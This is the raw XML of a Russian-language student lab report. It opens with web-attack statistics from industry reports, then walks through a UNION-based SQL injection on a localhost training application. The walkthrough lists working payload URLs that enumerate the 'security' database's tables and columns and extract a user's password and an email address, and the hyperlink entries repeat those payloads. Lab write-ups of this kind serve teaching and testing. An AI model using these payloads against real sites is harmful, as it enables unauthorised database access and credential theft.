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Часть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https://www.verizon.com/about/news/2025-data-breach-investigations-report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Указано, что было проанализировано 22000 инцидентов 12195 подтвержденных утечек данных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злоупотребление учетными данными (22%) и использование уязвимостей (20%) по-прежнему являются основными начальными направлениями атак, что подчеркивает острую необходимость в усиленных мерах безопасности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включает в том числе эксплуатацию уязвимостей во внешних сервисах, периметровых устройствах и веб-доступных системах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https://global.ptsecurity.com/en/research/analytics/web-vulnerabilities-2020-2021/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Взял отсюда вывод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Экспертная оценка показывает, что многие уязвимости веб-сайтов связаны с ошибками в кодировании: за последние два года 72 процента обнаруженных уязвимостей были связаны с уязвимым кодом в веб-приложениях, таким как SQL-инъекции, XSS и некорректная проверка состояния или обработка исключений. Другие уязвимости были вызваны неправильным администрированием и могут быть устранены в настройках приложения. Чтобы исключить уязвимости, связанные с кодом, мы настоятельно рекомендуем организациям внедрять безопасный процесс разработки в жизненный цикл веб-приложений и использовать анализатор кода. Для более тщательного изучения уязвимостей приложений используется тестирование в режиме "белого ящика"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https://ptsecurity.com/research/analytics/aktualnye-kiberugrozy-iv-kvartal-2024-goda-i-kvartal-2025-goda/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - вывод из статьи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IV квартале 2024 года количество инцидентов увеличилось на 5% по сравнению с предыдущим кварталом и на 13% в сравнении с аналогичным периодом прошлого года. Вредоносное ПО остается основным инструментом злоумышленников: оно применялось в 66% успешных атак на организации и 51% на частных лиц. Против организаций чаще всего использовались шифровальщики (42%) и ВПО для удаленного управления (38%), против частных лиц — шпионское ПО (48%). Мы наблюдали увеличение интереса к шпионскому ПО в атаках на организации (20%, на 4 п. п. больше, чем в предыдущем квартале). За рассматриваемый период в результате 53% успешных атак на организации была раскрыта конфиденциальная информация, а нарушение основной деятельности компаний наблюдалось в 32% инцидентов. В 48% успешных атак на частных лиц злоумышленники были нацелены на получение финансовой выгоды, что на 18 п. п. больше по сравнению с аналогичным периодом прошлого года. Мы делаем вывод, что финансовые потери среди частных лиц в целом являются характерной чертой IV квартала года.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https://vercara.digicert.com/resources/vercara-waf-analysis-report-november-2025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за ноябрь 2025 года из 1.28 триллиона обработанных веб запросов системой UltraWAF (фаервол), вредоносными из них были 464 миллиарда, что составляет четверть от всех запросов.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Большая часть из этих запросов была связана с куки-файлами (около 55 %).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Больше всего атакам подвергались сайты для путешествий (81%), сайты связанные с финансами(16%), технологические и связанные с безопасностью (1%)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Пути атак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Cookie-based атаки (54.84%)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Command Injection (21.00%) (команды для ОС)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Field Format violations (10.12%)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Часть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Зашел на localhost:8080/task Нужно как-то ввести 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Попробовал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http://localhost:8080/task/1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - 404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Через параметры запроса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Попробуем воспользоваться уязвимостью к sql инъекциям.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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http://localhost:8080/task/?id=2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' - </w:t>
      </w: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Увидели ошибку в sql запросе, отсюда можем понять что запрос выглядит примерно таким образом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id=’параметр_запроса’ LIMIT 0,1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Попробуем узнать кол-во коллонок через order by ‘номер_колони’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http://localhost:8080/task/?id=%27+order+by+4+--+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Unknown column '4' in 'order clause'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 табличке 3 коллонки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Далее хотелось бы узнать как называется таблица, но для этого нужно занть название бд, узнаем через select database()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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http://localhost:8080/task/?id=-1%27+union+select+1,+database()+,+2--+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Что тут произошло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Запрос превратился в что-то вроде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id, username, password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users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WHERE id = '-1'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1, database(), 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Первый запрос ничего не вернет тк нет id = -1 а второй вернет в поле логин нужные нам вещи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Ваш id:1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Ваш логин:security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Окей база у нас называется security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031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http://localhost:8080/task/?id=-1%27+union+select+1,+table_name+,3+from+information_schema.tables+where+table_schema=%27security%27+--+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id, username, password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users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WHERE id = '-1' union select 1, table_name, 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information_schema.tables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table_schema='security' -- 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LIMIT 0,1;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Получим примерно такой запрос выдает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Ваш id:1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Ваш логин:emails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Таким образом мы нашли одну из таблиц добавим в запрос LIMIT и переберем все возможные, чтобы посмотреть какие таблицы есть</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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http://localhost:8080/task/?id=-1%27+union+select+1,+table_name+,3+from+information_schema.tables+where+table_schema=%27security%27+limit+1,1+--+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Ваш id:1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Ваш логин:users</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">localhost:8080/task/?id=-1%27+union+select+1,+table_name+,3+from+information_schema.tables+where+table_schema=%27security%27+limit+2,1+--+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Здесь уже белый экран значит 2 таблички users, emails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http://localhost:8080/task/?id=-1%27+union+select+1,+column_name+,3+from+information_schema.columns+where+table_schema=%27security%27+and+table_name=%27users%27++--+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Ваш id:1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Ваш логин:id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http://localhost:8080/task/?id=-1%27+union+select+1,+column_name+,3+from+information_schema.columns+where+table_schema=%27security%27+and+table_name=%27users%27+limit+1,1++--+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Ваш id:1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Ваш логин:username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http://localhost:8080/task/?id=-1%27+union+select+1,+column_name+,3+from+information_schema.columns+where+table_schema=%27security%27+and+table_name=%27users%27+limit+2,1++--+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Ваш id:1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Ваш логин:password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Теперь мы знаем имя бд, таблицы и коллонки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http://localhost:8080/task/?id=-1%27+union+select+username,+password,3+from+users+where+username=%27Volk2%27+--+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Ваш id:Volk2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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ваш логин:Wa spoiuuuuu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Ура! Узнали пароль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посмотрим в таблицу с почтами чтобы узнать почту</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055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http://localhost:8080/task/?id=-1%27+union+select+1,+column_name+,3+from+information_schema.columns+where+table_schema=%27security%27+and+table_name=%27emails%27+limit+0,1++--+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Ваш id:1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Ваш логин:id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058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http://localhost:8080/task/?id=-1%27+union+select+1,+column_name+,3+from+information_schema.columns+where+table_schema=%27security%27+and+table_name=%27emails%27+limit+1,1++--+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Ваш id:1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Ваш логин:email_id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B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http://localhost:8080/task/?id=-1%27+union+select+1,+column_name+,3+from+information_schema.columns+where+table_schema=%27security%27+and+table_name=%27emails%27+limit+2,1++--+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Тут ничего нет значит коллоки все знаеи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Найдем айди человечка с именем Vinni-pukh и далее пробить его в таблице с почтами </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E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http://localhost:8080/task/?id=-1%27+union+select+username,+id,3+from+users+where+username=%27Vinni-pukh%27+--+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Ваш id:Vinni-pukh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Ваш логин:4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061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http://localhost:8080/task/?id=-1%27+union+select+id,+email_id,3+from+emails+where+id=%274%27+--+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Ваш id:4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Ваш логин:honey_lover@otus-lab.com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:8080/task/?id=-1%27+union+select+1,+column_name+,3+from+information_schema.columns+where+table_schema=%27security%27+and+table_name=%27users%27+limit+1,1++--+" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/task/?id=-1%27+union+select+username,+password,3+from+users+where+username=%27Volk2%27+--+" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/task/?id=-1%27+union+select+1,+column_name+,3+from+information_schema.columns+where+table_schema=%27security%27+and+table_name=%27users%27+limit+2,1++--+" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/task/?id=-1%27+union+select+1,+column_name+,3+from+information_schema.columns+where+table_schema=%27security%27+and+table_name=%27emails%27+limit+1,1++--+" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/task/?id=-1%27+union+select+1,+column_name+,3+from+information_schema.columns+where+table_schema=%27security%27+and+table_name=%27emails%27+limit+0,1++--+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ercara.digicert.com/resources/vercara-waf-analysis-report-november-2025" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/task/?id=-1%27+union+select+username,+id,3+from+users+where+username=%27Vinni-pukh%27+--+" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/task/?id=-1%27+union+select+1,+column_name+,3+from+information_schema.columns+where+table_schema=%27security%27+and+table_name=%27emails%27+limit+2,1++--+" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/task/?id=-1%27+union+select+id,+email_id,3+from+emails+where+id=%274%27+--+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erizon.com/about/news/2025-data-breach-investigations-report" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://global.ptsecurity.com/en/research/analytics/web-vulnerabilities-2020-2021/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptsecurity.com/research/analytics/aktualnye-kiberugrozy-iv-kvartal-2024-goda-i-kvartal-2025-goda/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/task/?id=1" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/task/1" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/task/?id=2" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/task/?id=%27+order+by+4+--+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localhost:8080/task/?id=-1%27+union+select+1,+table_name+,3+from+information_schema.tables+where+table_schema=%27security%27+--+" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/task/?id=-1%27+union+select+1,+database()+,+2--+" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/task/?id=-1%27+union+select+1,+column_name+,3+from+information_schema.columns+where+table_schema=%27security%27+and+table_name=%27users%27++--+" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/task/?id=-1%27+union+select+1,+table_name+,3+from+information_schema.tables+where+table_schema=%27security%27+limit+1,1+--+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